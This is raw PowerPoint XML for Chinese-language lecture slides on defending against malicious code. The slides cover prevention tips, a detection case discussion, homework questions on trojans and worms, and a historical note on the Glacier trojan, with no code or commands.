          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码防范</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169990" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629317" y="1101725"/>
            <a:ext cx="7482297" cy="5194144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常用的防范恶意代码措施： </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>及时修补漏洞，安装补丁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>培养风险意识，不使用来历不明的软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不打开可疑短信、邮件及其附件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装杀毒软件且不关闭查杀功能，即时发现，即时清除 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>移动存储设备：用前查杀</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关闭不必要的网络端口和服务</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1215CA7-8396-43BB-8569-4AEC44B7BEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C2AF406-8284-43BC-BE95-84A224638C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED1D10E7-18D1-40A8-8D0F-DC74ABC64A58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1029089" y="2741612"/>
            <a:ext cx="6696075" cy="2562225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117960684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en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本章小结</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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>讨论</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="289718" y="1242520"/>
            <a:ext cx="8654257" cy="4972050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="圆角矩形标注 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4887311" y="3783723"/>
            <a:ext cx="2632842" cy="1135117"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69982"/>
              <a:gd name="adj2" fmla="val 98469"/>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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>更新：将源目录下的所有文件（含子目录）拷贝到目的目录下</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="117872" y="1140535"/>
            <a:ext cx="8854282" cy="5286375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形标注 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="306196" y="1242520"/>
            <a:ext cx="4741260" cy="1995596"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 67008"/>
              <a:gd name="adj2" fmla="val 4696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just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>问题一：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>认为其是勒索病毒的可能原因是什么？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>问题二：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>360</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>采用的是特征检测还是异常检测方法？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405420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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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235" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作业</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95236" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="250825" y="2484438"/>
            <a:ext cx="73025" cy="144462"/>
          </a:xfrm>
          <a:prstGeom prst="octagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 29287"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95237" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="1352550"/>
            <a:ext cx="7553325" cy="4705350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、简要分析计算机病毒、木马、蠕虫的区别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、为了提高隐蔽性，木马有哪些隐藏技术？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、比较分析木马静态检测和动态检测技术的优缺点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"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2E12EDF-DAFF-4701-A479-4879972E86F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547574" y="2654599"/>
            <a:ext cx="4782617" cy="1548801"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参考内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0997D52-3A9B-4F29-98E7-8FCC7A7F84D8}"/>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48134743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674684" y="2760689"/>
            <a:ext cx="6019800" cy="958850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一、木马实例（冰河）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3016626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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18438" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565150" y="1311274"/>
            <a:ext cx="7848600" cy="5032375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>木马程序具有很大的危害性，主要表现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动搜索已中木马的计算机；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理对方资源，如复制文件、删除文件、查看文件内容、上传文件、下载文件等；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跟踪监视对方屏幕；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接控制对方的键盘、鼠标；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随意修改注册表和系统文件；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>共享被控计算机的硬盘资源；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>监视对方任务且可终止对方任务；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程重启和关闭机器。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178202775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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰河</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115718" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="1458912"/>
            <a:ext cx="7772400" cy="4910357"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>冰河开发于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年，跟灰鸽子类似，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年中美黑客大战中为中国黑客增了不少面子。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作者：黄鑫（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>glacier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，西安电子科大，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>底加盟安全焦点，开发了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Xscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
